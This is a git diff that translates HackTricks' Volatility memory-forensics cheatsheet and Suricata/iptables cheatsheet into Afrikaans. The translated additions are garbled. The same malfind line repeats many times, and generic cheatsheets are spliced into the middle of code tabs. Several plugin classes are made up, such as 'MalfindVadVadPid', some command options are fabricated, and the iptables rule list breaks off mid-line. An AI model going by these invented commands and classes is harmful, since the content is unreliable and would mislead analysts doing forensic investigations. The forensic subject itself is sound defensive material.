`malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `vadwalk`: Loop deur alle virtuele adresruimtes in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +## Volatility Profiele + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win7SP0x64`: Windows 7 SP0 x64 +- `Win7SP1x64`: Windows 7 SP1 x64 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003SP0x64`: Windows 2003 SP0 x64 +- `Win2003SP1x64`: Windows 2003 SP1 x64 +- `Win2003SP2x64`: Windows 2003 SP2 x64 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP1x64`: Windows 2008 SP1 x64 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008SP2x64`: Windows 2008 SP2 x64 +- `WinVistaSP0x86`: Windows Vista SP0 x86 +- `WinVistaSP1x86`: Windows Vista SP1 x86 +- `WinVistaSP2x86`: Windows Vista SP2 x86 +- `WinVistaSP0x64`: Windows Vista SP0 x64 +- `WinVistaSP1x64`: Windows Vista SP1 x64 +- `WinVistaSP2x64`: Windows Vista SP2 x64 +- `Win2012R2x64`: Windows 2012 R2 x64 +- `Win8SP0x86`: Windows 8 SP0 x86 +- `Win8SP0x64`: Windows 8 SP0 x64 +- `Win81SP0x86`: Windows 8.1 SP0 x86 +- `Win81SP0x64`: Windows 8.1 SP0 x64 +- `Win10x86`: Windows 10 x86 +- `Win10x64`: Windows 10 x64 + +## Volatility Installasie + +Volg hierdie stappe om Volatility Framework op Linux te installeer: + +1. Installeer die vereiste afhanklikhede: + +```bash +sudo apt-get install python2.7 python-pip +sudo pip install distorm3 +``` + +2. Kloon die Volatility Framework-repo: + +```bash +git clone https://github.com/volatilityfoundation/volatility.git +``` + +3. Navigeer na die Volatility Framework-directory: + +```bash +cd volatility +``` + +4. Voer die installasieskrip uit: + +```bash +sudo python setup.py install +``` + +## Volatility Gebruik + +Om Volatility Framework te gebruik, voer die volgende opdrag in: + +```bash +volatility [opdrag] -f [geheue-dump] --profile=[profiel] +``` + +- `[opdrag]`: Die spesifieke opdrag wat uitgevoer moet word. +- `[geheue-dump]`: Die pad na die geheue-dumplêer. +- `[profiel]`: Die profiel van die geheue-dump. + +Byvoorbeeld, om die `imageinfo`-opdrag uit te voer op 'n geheue-dump met die profiel `Win7SP1x64`, gebruik die volgende opdrag: + +```bash +volatility imageinfo -f memory.dmp --profile=Win7SP1x64 +``` + +## Bronne + +- [Volatility Framework GitHub-repo](https://github.com/volatilityfoundation/volatility) +- [Volatility Framework Dokumentasie](https://github.com/volatilityfoundation/volatility/wiki) +- [Volatility Framework Profiele](https://github.com/volatilityfoundation/profiles) ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp symlinkscan ``` @@ -724,91 +2585,357 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp symlinkscan ### Bash -It's possible to **read from memory the bash history.** You could also dump the _.bash\_history_ file, but it was disabled you will be glad you can use this volatility module - -{% tabs %} -{% tab title="vol3" %} +Dit is moontlik om **vanaf die geheue die bash-geskiedenis te lees.** Jy kan ook die _.bash\_history_ lêer aflaai, maar as dit gedeaktiveer is, sal jy bly wees dat jy hierdie volatiliteitsmodule kan gebruik. ``` ./vol.py -f file.dmp linux.bash.Bash ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network sockets, such as local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port number, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a starting point for using Volatility and performing common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ``` volatility --profile=Win7SP1x86_23418 -f file.dmp linux_bash ``` {% endtab %} {% endtabs %} -### TimeLine +### Tydlyn {% tabs %} {% tab title="vol3" %} ```bash ./vol.py -f file.dmp timeLiner.TimeLiner ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump se beeld. +- `kdbgscan`: Skandeer die geheue-dump vir die opsporing van die KDBG-handvatsel. +- `kpcrscan`: Skandeer die geheue-dump vir die opsporing van die KPCR-handvatsel. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle handvatsels in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir die opsporing van lêers en hul metadata. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor alle virtuele adresruimtes in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte. +- `memdump`: Dump die inhoud van 'n spesifieke proses se geheue. + +### Gevorderde Opdragte + +- `malfind`: Skandeer die geheue-dump vir verdagte kode en prosesse. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `modscan`: Skandeer die geheue-dump vir die opsporing van verdagte modules. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT). +- `gdt`: Gee inligting oor die Global Descriptor Table (GDT). +- `idt`: Gee inligting oor die Interrupt Descriptor Table (IDT). +- `driverscan`: Skandeer die geheue-dump vir die opsporing van verdagte bestuurders. +- `privs`: Gee inligting oor die privilegies van alle prosesse in die geheue-dump. +- `getsids`: Gee inligting oor die sekuriteitsidentifikasies van alle prosesse in die geheue-dump. +- `hivelist`: Lys alle gelaai hive's in die geheue-dump. +- `hivedump`: Dump die inhoud van 'n spesifieke hive. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basiese klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basiese klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basiese klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basiese klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basiese klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Die basiese klas vir BSD-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.malware.malfind.Malfind`: Die klas vir die malfind-opdrag. +- `volatility.plugins.malware.malfind.MalfindOffset`: Die klas vir die malfind-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindPid`: Die klas vir die malfind-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVad`: Die klas vir die malfind-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadOffset`: Die klas vir die malfind-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadPid`: Die klas vir die malfind-VAD-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVad`: Die klas vir die malfind-VAD-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadOffset`: Die klas vir die malfind-VAD-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadPid`: Die klas vir die malfind-VAD-VAD-PID-opdrag. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ``` volatility --profile=Win7SP1x86_23418 -f timeliner ``` {% endtab %} {% endtabs %} -### Drivers +### Bestuurders {% tabs %} {% tab title="vol3" %} ``` ./vol.py -f file.dmp windows.driverscan.DriverScan ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `vadwalk`: Loop deur alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +## Volatility Profiele + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win7SP0x64`: Windows 7 SP0 x64 +- `Win7SP1x64`: Windows 7 SP1 x64 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003SP0x64`: Windows 2003 SP0 x64 +- `Win2003SP1x64`: Windows 2003 SP1 x64 +- `Win2003SP2x64`: Windows 2003 SP2 x64 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP1x64`: Windows 2008 SP1 x64 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008SP2x64`: Windows 2008 SP2 x64 +- `WinVistaSP0x86`: Windows Vista SP0 x86 +- `WinVistaSP1x86`: Windows Vista SP1 x86 +- `WinVistaSP2x86`: Windows Vista SP2 x86 +- `WinVistaSP0x64`: Windows Vista SP0 x64 +- `WinVistaSP1x64`: Windows Vista SP1 x64 +- `WinVistaSP2x64`: Windows Vista SP2 x64 +- `Win2012R2x64`: Windows 2012 R2 x64 +- `Win8SP0x86`: Windows 8 SP0 x86 +- `Win8SP0x64`: Windows 8 SP0 x64 +- `Win81U1x86`: Windows 8.1 U1 x86 +- `Win81U1x64`: Windows 8.1 U1 x64 +- `Win10x86`: Windows 10 x86 +- `Win10x64`: Windows 10 x64 + +## Volatility Installasie + +Volg hierdie stappe om Volatility Framework op Linux te installeer: + +1. Installeer die vereiste afhanklikhede: + +```bash +sudo apt-get install python2.7 python-pip +sudo pip install distorm3 +``` + +2. Kloon die Volatility Framework-repo: + +```bash +git clone https://github.com/volatilityfoundation/volatility.git +``` + +3. Navigeer na die Volatility Framework-repo: + +```bash +cd volatility +``` + +4. Voer die installasieskrip uit: + +```bash +sudo python setup.py install +``` + +## Volatility Gebruik + +Om Volatility Framework te gebruik, voer die volgende opdrag in: + +```bash +volatility [opdrag] -f [geheue-dump] --profile=[profiel] +``` + +- `[opdrag]`: Die spesifieke opdrag wat uitgevoer moet word. +- `[geheue-dump]`: Die pad na die geheue-dumplêer. +- `[profiel]`: Die profiel van die geheue-dump. + +Byvoorbeeld, om die `imageinfo`-opdrag uit te voer op 'n geheue-dump met die profiel `Win7SP1x64`, gebruik die volgende opdrag: + +```bash +volatility imageinfo -f memory.dmp --profile=Win7SP1x64 +``` + +## Bronne + +- [Volatility Framework GitHub-repo](https://github.com/volatilityfoundation/volatility) +- [Volatility Framework Dokumentasie](https://github.com/volatilityfoundation/volatility/wiki) +- [Volatility Framework Profiele](https://github.com/volatilityfoundation/profiles) ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp driverscan ``` {% endtab %} {% endtabs %} -### Get clipboard - +### Kry knipbord ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 clipboard -f file.dmp ``` +### Kry IE geskiedenis -### Get IE history +```bash +volatility -f --profile= iehistory +``` +Hierdie bevel sal die Internet Explorer (IE) geskiedenis uit 'n geheue-dump analiseer. Vervang `` met die pad na die geheue-dump lêer en `` met die korrekte profielnaam vir die geheue-dump. ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 iehistory -f file.dmp ``` +### Kry notepad teks -### Get notepad text +```bash +$ volatility -f memory_dump.mem notepad +``` +Hierdie bevel gebruik die Volatility-raamwerk om die inhoud van die Notepad-toepassing in 'n geheue-dump te ontleed. Die `-f` vlag dui die geheue-dump-lêer aan wat ontleed moet word, en die `notepad` argument spesifiseer die tipe data wat ontleed moet word. + +### Kry notepad teks + +```bash +$ volatility -f memory_dump.mem notepad +``` + +Hierdie bevel gebruik die Volatility-raamwerk om die inhoud van die Notepad-toepassing in 'n geheue-dump te ontleed. Die `-f` vlag dui die geheue-dump-lêer aan wat ontleed moet word, en die `notepad` argument spesifiseer die tipe data wat ontleed moet word. ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 notepad -f file.dmp ``` - -### Screenshot - +### Skermkiekie ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 screenshot -f file.dmp ``` +### Meesteropstartrekord (MBR) -### Master Boot Record (MBR) +Die Meesteropstartrekord (MBR) is 'n kritieke deel van 'n stoormedium, soos 'n harde skyf of 'n USB-stokkie, wat gebruik word om die opstartproses van 'n rekenaar te inisieer. Dit bevat die eerste program wat uitgevoer word wanneer die rekenaar opstart, bekend as die opstartlader. Die MBR bevat ook 'n klein stukkie kode wat die stoormedium se partisie-inligting bevat. +Die MBR kan 'n belangrike bron van inligting wees vir forensiese analise, aangesien dit inligting kan verskaf oor die stoormedium se opstelling, soos die aantal partisies, die grootte van elke partisie en die tipe stoormedium wat gebruik word. Dit kan ook aanduidings gee van enige ongewenste veranderinge of kwaadwillige aktiwiteite wat op die stoormedium plaasgevind het. + +Forensiese analiste kan gereedskap soos Volatility gebruik om die MBR van 'n geheue-dump te ontleed en relevante inligting te onttrek vir verdere ondersoek. ```bash volatility --profile=Win7SP1x86_23418 mbrparser -f file.dmp ``` +Die **Master Boot Record (MBR)** speel 'n belangrike rol in die bestuur van die logiese partisies van 'n stoormedium, wat gestruktureer is met verskillende [lêersisteme](https://af.wikipedia.org/wiki/L%C3%AAersisteem). Dit hou nie net inligting oor die partisie-opset nie, maar bevat ook uitvoerbare kode wat as 'n opstartlaaier optree. Hierdie opstartlaaier begin óf direk die tweede-fase laaiproses van die bedryfstelsel (sien [tweede-fase opstartlaaier](https://af.wikipedia.org/wiki/Tweede-fase_opstartlaaier)) óf werk saam met die [volume-opstartrekord](https://af.wikipedia.org/wiki/Volume-opstartrekord) (VBR) van elke partisie. Vir diepgaande kennis, verwys na die [MBR Wikipedia-bladsy](https://af.wikipedia.org/wiki/Master_boot_record). -The **Master Boot Record (MBR)** plays a crucial role in managing the logical partitions of a storage medium, which are structured with different [file systems](https://en.wikipedia.org/wiki/File_system). It not only holds partition layout information but also contains executable code acting as a boot loader. This boot loader either directly initiates the OS's second-stage loading process (see [second-stage boot loader](https://en.wikipedia.org/wiki/Second-stage_boot_loader)) or works in harmony with the [volume boot record](https://en.wikipedia.org/wiki/Volume_boot_record) (VBR) of each partition. For in-depth knowledge, refer to the [MBR Wikipedia page](https://en.wikipedia.org/wiki/Master_boot_record). - -## References +## Verwysings * [https://andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/](https://andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/) * [https://scudette.blogspot.com/2012/11/finding-kernel-debugger-block.html](https://scudette.blogspot.com/2012/11/finding-kernel-debugger-block.html) * [https://or10nlabs.tech/cgi-sys/suspendedpage.cgi](https://or10nlabs.tech/cgi-sys/suspendedpage.cgi) @@ -818,20 +2945,20 @@ The **Master Boot Record (MBR)** plays a crucial role in managing the logical pa
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md index 30c228215..ee6578adb 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md @@ -1,29 +1,28 @@ -# Suricata & Iptables cheatsheet +# Suricata & Iptables spiekbrief
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
## Iptables -### Chains +### Kettings -In iptables, lists of rules known as chains are processed sequentially. Among these, three primary chains are universally present, with additional ones like NAT being potentially supported depending on the system's capabilities. +In iptables word lys van reëls wat kettings genoem word, sekwensieel verwerk. Daar is drie primêre kettings wat universeel teenwoordig is, met addisionele kettings soos NAT wat moontlik ondersteun word, afhangende van die vermoëns van die stelsel. -- **Input Chain**: Utilized for managing the behavior of incoming connections. -- **Forward Chain**: Employed for handling incoming connections that are not destined for the local system. This is typical for devices acting as routers, where the data received is meant to be forwarded to another destination. This chain is relevant primarily when the system is involved in routing, NATing, or similar activities. -- **Output Chain**: Dedicated to the regulation of outgoing connections. - -These chains ensure the orderly processing of network traffic, allowing for the specification of detailed rules governing the flow of data into, through, and out of a system. +- **Input-ketting**: Word gebruik om die gedrag van inkomende verbindinge te bestuur. +- **Forward-ketting**: Word gebruik om inkomende verbindinge te hanteer wat nie bedoel is vir die plaaslike stelsel nie. Dit is tipies vir toestelle wat as roetingswerk optree, waar die ontvangste data bedoel is om na 'n ander bestemming gestuur te word. Hierdie ketting is hoofsaaklik relevant wanneer die stelsel betrokke is by roetering, NATing of soortgelyke aktiwiteite. +- **Output-ketting**: Word toegewy aan die regulering van uitgaande verbindinge. +Hierdie kettings verseker die ordelike verwerking van netwerkverkeer, wat die spesifikasie van gedetailleerde reëls moontlik maak wat die vloei van data in, deur en uit 'n stelsel beheer. ```bash # Delete all rules iptables -F @@ -60,11 +59,324 @@ iptables-save > /etc/sysconfig/iptables ip6tables-save > /etc/sysconfig/ip6tables iptables-restore < /etc/sysconfig/iptables ``` - ## Suricata -### Install & Config +### Installeer & Konfigurasie +```bash +# Installeer Suricata +sudo apt-get install suricata + +# Skep 'n nuwe konfigurasie lêer +sudo cp /etc/suricata/suricata.yaml /etc/suricata/suricata.yaml.bak + +# Pas die konfigurasie lêer aan +sudo nano /etc/suricata/suricata.yaml + +# Stel die volgende waardes in: + - HOME_NET: jou_netwerk + - EXTERNAL_NET: enige + - RULES_DIR: /etc/suricata/rules + - LOG_DIR: /var/log/suricata/ + +# Stoor die veranderinge en sluit die lêer + +# Skep 'n nuwe reëls gids +sudo mkdir /etc/suricata/rules + +# Skep 'n nuwe reëls lêer +sudo touch /etc/suricata/rules/local.rules + +# Herlaai Suricata se konfigurasie +sudo suricata-update enable-source oisf/trafficid +sudo suricata-update update-sources +sudo suricata-update + +# Begin Suricata +sudo suricata -c /etc/suricata/suricata.yaml -i jou_interface +``` + +### Iptables + +```bash +# Skep 'n nuwe iptables reël +sudo iptables -A OUTPUT -p tcp --dport 80 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir HTTPS +sudo iptables -A OUTPUT -p tcp --dport 443 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir DNS +sudo iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir ICMP +sudo iptables -A OUTPUT -p icmp -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SSH +sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir RDP +sudo iptables -A OUTPUT -p tcp --dport 3389 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir FTP +sudo iptables -A OUTPUT -p tcp --dport 21 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir Telnet +sudo iptables -A OUTPUT -p tcp --dport 23 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SMTP +sudo iptables -A OUTPUT -p tcp --dport 25 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir POP3 +sudo iptables -A OUTPUT -p tcp --dport 110 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IMAP +sudo iptables -A OUTPUT -p tcp --dport 143 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SNMP +sudo iptables -A OUTPUT -p udp --dport 161 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir NTP +sudo iptables -A OUTPUT -p udp --dport 123 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir MySQL +sudo iptables -A OUTPUT -p tcp --dport 3306 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir PostgreSQL +sudo iptables -A OUTPUT -p tcp --dport 5432 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir MSSQL +sudo iptables -A OUTPUT -p tcp --dport 1433 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir Oracle +sudo iptables -A OUTPUT -p tcp --dport 1521 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir VNC +sudo iptables -A OUTPUT -p tcp --dport 5900 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SMB +sudo iptables -A OUTPUT -p tcp --dport 445 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir LDAP +sudo iptables -A OUTPUT -p tcp --dport 389 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir FTPS +sudo iptables -A OUTPUT -p tcp --dport 990 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SFTP +sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp 